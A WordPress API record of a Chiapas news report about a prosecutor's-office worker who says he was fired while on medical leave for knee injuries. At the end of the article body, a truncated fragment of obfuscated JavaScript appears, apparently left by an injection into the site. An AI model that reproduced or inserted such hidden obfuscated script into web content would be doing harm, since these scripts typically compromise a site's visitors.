{"id":20961,"date":"2025-03-19T03:38:43","date_gmt":"2025-03-19T03:38:43","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=20961"},"modified":"2025-03-19T03:38:44","modified_gmt":"2025-03-19T03:38:44","slug":"trabajador-denuncian-despido-injustificado-de-la-fge-por-padecimiento-en-sus-piernas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=20961","title":{"rendered":"Trabajador denuncian despido injustificado de la FGE por padecimiento en sus piernas"},"content":{"rendered":"\n<p>Manuel Jim\u00e9nez.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"20962\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250318-WA0028-1024x768.jpg\" alt=\"\" class=\"wp-image-20962\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250318-WA0028-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250318-WA0028-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250318-WA0028-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250318-WA0028-1536x1152.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250318-WA0028.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>18 de marzo del 2025. Tuxtla Guti\u00e9rrez.- Este martes \u00c1ngel Enrique Guti\u00e9rrez G\u00f3mez, denunci\u00f3 despido injustificado de la Fiscal\u00eda General del Estado (FGE) adscrito a la Fiscal\u00eda de Combate al Robo de Veh\u00edculo.<\/p>\n\n\n\n<p>Detall\u00f3 que esta lesionado y atrofiados los meniscos de las rodillas, situaci\u00f3n que limita su movilidad y por este padecimiento el Instituto Mexicano del Seguro Social (IMSS) le ha dado incapacidades desde hace varios meses, las cuales presentaba en tiempo y forma ante la FGE.<\/p>\n\n\n\n<p>Lamentablemente fue el pasado mes de enero, el fiscal Miguel \u00c1ngel Z\u00fa\u00f1iga Morales condicion\u00f3 el recibirle su incapacidad.<\/p>\n\n\n\n<p>Detall\u00f3 que: \u201cA principios del mes de enero precisamente yo llegu\u00e9 a las instalaciones de la Fiscal\u00eda de combate a robo de veh\u00edculo a presentar mi incapacidad m\u00e9dica, me la recibieron pero no de muy buena forma me atendi\u00f3 la delegada Blanca y me atendi\u00f3 el fiscal Miguel \u00c1ngel Z\u00fa\u00f1iga Morales, quienes pues de manera despectiva y la verdad inhumana porque daban a entender que no cre\u00edan en mi lesi\u00f3n y en ese momento me dijeron de que no me iban a permitir retirarme de las instalaciones, porque me iban a trasladar al \u00e1rea de los servicios periciales de la fiscal\u00eda para que me valoraran qu\u00e9 que era lo que ten\u00eda\u201d.<br>Para el 20 de febrero le enviaron un correo electr\u00f3nico en el que le informaron que caus\u00f3 baja de la instituci\u00f3n, por lo que interpuso varias quejas, ante la Comisi\u00f3n Estatal de derechos humanos y en el \u00d3rgano interno de control de la FGE.<\/p>\n\n\n\n<p>Sin embargo, hasta el momento no ha tenido respuesta de ellas.<\/p>\n\n\n\n<p>Guti\u00e9rrez G\u00f3mez acudi\u00f3 el 4 de marzo pasado a recibir su terapia en el IMSS y en ese momento se enter\u00f3 que ya no tiene derecho la atenci\u00f3n m\u00e9dica, lo que ha agravado el padecimiento de sus rodillas, por lo que reiter\u00f3 su petici\u00f3n al Fiscal General del Estado a que voltee a ver su caso.<\/p>\n\n\n\n<p>\u201cDe manera personal no me ha atendido pero ya se present\u00f3 un escrito al titular de la fiscal\u00eda que es el licenciado Jorge Luis Llaven Abarca a quien le pido la atenci\u00f3n para que me apoye en esclarecer mi situaci\u00f3n\u201d, expres\u00f3.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez. 18 de marzo del 2025. Tuxtla Guti\u00e9rrez.- Este martes \u00c1ngel Enrique Guti\u00e9rrez G\u00f3mez, denunci\u00f3 despido injustificado de la Fiscal\u00eda General del Estado (FGE) adscrito a la Fiscal\u00eda de Combate al Robo de Veh\u00edculo. Detall\u00f3 que esta lesionado y atrofiados los meniscos de las rodillas, situaci\u00f3n que limita su movilidad y por este padecimiento &hellip;<\/p>\n","protected":false},"author":2,"featured_media":20962,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-20961","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20961","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=20961"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20961\/revisions"}],"predecessor-version":[{"id":20963,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20961\/revisions\/20963"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/20962"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=20961"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=20961"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=20961"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}